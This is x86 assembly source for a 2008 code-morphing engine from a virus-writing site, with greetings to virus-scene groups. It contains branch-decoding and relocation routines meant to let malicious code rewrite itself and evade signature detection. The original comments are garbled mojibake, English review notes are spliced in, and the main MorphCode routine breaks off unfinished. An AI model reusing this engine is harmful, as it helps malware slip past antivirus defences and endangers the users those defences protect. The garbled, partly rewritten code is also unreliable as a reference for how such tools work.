;::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Simple Morpher v.0.1 :
; :
; x0man <20> 2008 :
; :
; http://www.virustech.org/ :
;::::::::::::::::::::::::::::::::::::::::::::::::::::::
;-----------------------------------------------------------------------------------------:
; :
;<3B> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
; :
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: :
; :
;_OPCODE struct; :
; dwOldAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
; dwNewAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
; dwJumpAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>) :
; ; (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
; dwLength dd ? ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> :) :
;_OPCODE ends :
; :
;<3B> "<22><><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> _OPCODE. :
; 2. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
; 3. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> EIP <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>. :
; 4. <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP) :
; :
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; 2. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>). :
; :
; :
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>! :
; :
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> Catchy_32, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> :
; http://www.wasm.ru, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
; :
;GreeTz: :
; Osen :
; izee [ EOF-Project ] http://eof-project.net/ :
; :
; tPORt (http://www.tport.org/) :
; REVENGE(http://www.revenge-crew.com/) :
; TLG (http://tlg.astalavista.ms/) :
; TSRh (http://tsrh.org.ua/) :
; TPOC (http://vx.netlux.org/tpoc/) :
; :
; :
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! :
; :
; 10.05.2008 :
; x0man [VirusTech] :
; http://www.virustech.org :
;-----------------------------------------------------------------------------------------:
.386
.model flat, stdcall
option casemap :none
include \MASM32\INCLUDE\windows.inc
include \MASM32\INCLUDE\kernel32.inc
include \MASM32\INCLUDE\user32.inc
includelib \MASM32\LIB\kernel32.lib
includelib \MASM32\LIB\user32.lib
; #########################################################################
_OPCODE struct
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; One record per instruction of the code being morphed.  MorphCode fills
; an array of these while it walks the input (ECX points at the current
; entry); get_new_jump_address scans that array and treats the first
; entry whose dwOldAddress is 0 as the end of the table, so address 0
; can never be a real entry.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
dwOldAddress dd ? ; address of the instruction in the ORIGINAL code
                  ; (ESI at the time MorphCode records the entry)
dwNewAddress dd ? ; address at which the rewritten instruction is emitted
                  ; (EDI at the time MorphCode records the entry)
dwJumpAddress dd ? ; branches only: target address in the ORIGINAL code,
                   ; as returned by get_jump_address.  In the part of
                   ; MorphCode visible here the non-branch path never
                   ; writes it, so it keeps the zero the freshly
                   ; VirtualAlloc'd (zero-filled) buffer started with.
dwLength dd ? ; length in bytes of the original instruction - the EAX
              ; returned by c_Catchy ("OUT EAX == Instruction Length")
_OPCODE ends
; #########################################################################
.code
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :)
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
test_code:
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Test fixture: a meaningless but well-formed stretch of x86 code
; for the morpher to work on.  It mixes the branch forms that
; get_jump_address recognises - JMP, Jcc and CALL, short or near
; (the assembler chooses the encoding from the distance to the
; target) - with plain ALU/stack instructions and 150 zero bytes,
; then ends in RET with an INT 3 trap behind it.
; The bytes ARE the test vector: do not "clean up" e.g. cmp eax,0
; into test eax,eax, that would change what the morpher is fed.
; NOTE(review): the code that hands test_code to MorphCode is not
; in this part of the file.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@@:
jmp @F                  ; forward: over the zero bytes to the second @@
mov eax, edx
pop eax
push eax
call @F                 ; forward CALL, also to the second @@
cmp eax, 0
jne @B                  ; backward, to the first @@
jmp @B
add ecx, edx
add eax, edx
xchg edx, ecx
call @B                 ; backward CALL to the first @@
jne @F
; 150 zero bytes of filler (15 x 10)
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0
jne @B                  ; backward over the filler, to the first @@
ret
@@:
ret
int 3                   ; trap if execution ever runs past the final ret
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
include Catchy32\Catchy32.inc
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: dwCurrentAddress - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> |
; |
; 00000000: 74 30 JE imm8 |
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "imm8" |
; <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm8 = 00000000 + 30 + 2 = 00000032 |
; <20>.<2E>. |
; 00000000 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> |
; 30 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; 2 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JE imm8 |
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
; 00000000: 74 30 JE 00000032 --. |
; 00000002: | |
; | |
; 00000032: <-----<2D> |
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ;-) |
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|:::|
; IN dwCurrentAddress : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; OUT EAX : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
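get_jump_address proc dwCurrentAddress : DWORD
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD get_jump_address(DWORD dwCurrentAddress)      stdcall, flat
;
; Decodes the relative branch at dwCurrentAddress and returns its
; absolute target: target = address of the following instruction
; + sign-extended displacement.  Recognised forms (the same set
; MorphCode rewrites):
;   70h..7Fh rel8        Jcc  short   2 bytes
;   EBh      rel8        JMP  short   2 bytes
;   0Fh 80h..8Fh rel32   Jcc  near    6 bytes
;   E9h      rel32       JMP  near    5 bytes
;   E8h      rel32       CALL near    5 bytes
;
; IN   dwCurrentAddress : address of the first opcode byte
; OUT  EAX              : target address, or 0 when the bytes at
;                         dwCurrentAddress are none of the forms
;                         above (the original left EAX undefined
;                         there: AL = opcode, upper bits unchanged)
; Preserves ECX, EDI.  Clobbers flags.
;
; Review notes on this rewrite:
;  - Opcode bytes are unsigned, so the range checks use JB/JBE.
;    The original used JL for the lower bound; on the second byte
;    of an 0Fh opcode that let 00h..7Fh (not branches) fall into
;    the Jcc-rel32 path and be reported as a branch target.
;  - The displacement is sign-extended and added with LEA instead
;    of being negated and subtracted.  The original rel8 path did
;    NEG AL / SUB AL,2 on a zero-extended EAX, so rel8 = -1 wrapped
;    to 255 and the target came out 256 bytes too low.  Plain
;    two's-complement addition needs no sign branch at all.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    push ecx
    push edi

    mov edi, dwCurrentAddress
    movzx eax, byte ptr [edi]           ; al = first opcode byte, rest of eax zero

    ;:::::::::::::::::::::::::::::::::::::
    ; 70h..7Fh : Jcc rel8
    cmp al, 070h
    jb @F
    cmp al, 07Fh
    jbe @_jump_imm8_
@@:
    ;:::::::::::::::::::::::::::::::::::::
    ; EBh : JMP rel8 (same layout as Jcc rel8)
    cmp al, 0EBh
    je @_jump_imm8_

    ;:::::::::::::::::::::::::::::::::::::
    ; 0Fh 80h..8Fh : Jcc rel32.  The second byte goes to CL so AL
    ; still holds the first byte for the checks that follow.
    cmp al, 00Fh
    jne @F
    mov cl, byte ptr [edi + 1]
    cmp cl, 080h
    jb @F
    cmp cl, 08Fh
    jbe @_jump_imm32_
@@:
    ;:::::::::::::::::::::::::::::::::::::
    ; E9h : JMP rel32 / E8h : CALL rel32 - identical layout and length
    cmp al, 0E9h
    je @_jmp_or_call_imm32_
    cmp al, 0E8h
    je @_jmp_or_call_imm32_

    ;:::::::::::::::::::::::::::::::::::::
    ; not a relative branch we know how to decode
    xor eax, eax
    jmp @_exit_

@_jump_imm8_:
    movsx eax, byte ptr [edi + 1]       ; rel8, sign-extended to 32 bits
    lea eax, [edi + eax + 2]            ; next_ip (cur + 2) + rel8
    jmp @_exit_

@_jump_imm32_:
    mov eax, dword ptr [edi + 2]        ; rel32 after 0F xx
    lea eax, [edi + eax + 6]            ; next_ip (cur + 6) + rel32
    jmp @_exit_

@_jmp_or_call_imm32_:
    mov eax, dword ptr [edi + 1]        ; rel32 after E8 / E9
    lea eax, [edi + eax + 5]            ; next_ip (cur + 5) + rel32

@_exit_:
    pop edi
    pop ecx
    ret
get_jump_address endp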
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.... |
; |
; IN dwAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; IN pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... |
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
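get_new_jump_address proc dwAddress:DWORD, pOpcodes : DWORD
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD get_new_jump_address(DWORD dwAddress, _OPCODE *pOpcodes)  stdcall
;
; Looks up an ORIGINAL-code address in the _OPCODE table and returns
; the address at which that instruction was re-emitted.
;
; IN   dwAddress : address of an instruction in the original code
; IN   pOpcodes  : _OPCODE array, terminated by an entry whose
;                  dwOldAddress is 0
; OUT  EAX       : dwNewAddress of the matching entry, or 0 when
;                  dwAddress is not in the table
; Preserves ECX.  Clobbers flags.
;
; Review notes on this rewrite:
;  - In the original the not-found path set EAX to 0 and then fell
;    through into the found path's `mov eax, [ecx].dwNewAddress`,
;    so callers received the terminator entry's dwNewAddress
;    instead of 0.  The two paths now leave separately.
;  - The terminator is tested before the address compare, so an
;    empty table is handled without stepping past the terminator.
;    Consequence: dwAddress == 0 is always reported as not found.
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    push ecx

    assume ecx : ptr _OPCODE
    mov ecx, pOpcodes
    mov eax, dwAddress

@_scan_:
    cmp [ecx].dwOldAddress, 0           ; terminator reached -> not found
    je @_not_found_
    cmp [ecx].dwOldAddress, eax
    je @_found_
    add ecx, sizeof _OPCODE
    jmp @_scan_

@_found_:
    mov eax, [ecx].dwNewAddress
    jmp @_exit_

@_not_found_:
    xor eax, eax

@_exit_:
    assume ecx : nothing
    pop ecx
    ret
get_new_jump_address endp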
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP |
; <20><><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0CCh |
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
; IN dwCodeAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
; IN dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> |
; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
MorphCode proc dwCodeAddress : DWORD, dwOutputBuffer : DWORD
local pOpcodes : DWORD
local dwTotalCodeSize : DWORD
;::::::::::::::::::::::::::::::::::::::::::::::::::
; pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ::
; dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ::
;::::::::::::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
invoke VirtualAlloc, NULL, 1024*1024, MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE
mov pOpcodes, eax
;::::::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
push 0
pop dwTotalCodeSize
;:::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
assume ecx : ptr _OPCODE
mov esi, dwCodeAddress ; Code Address
mov edi, dwOutputBuffer ; New Code Address
mov ecx, pOpcodes ; array of _OPCODES
;::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::::::
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::::::
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
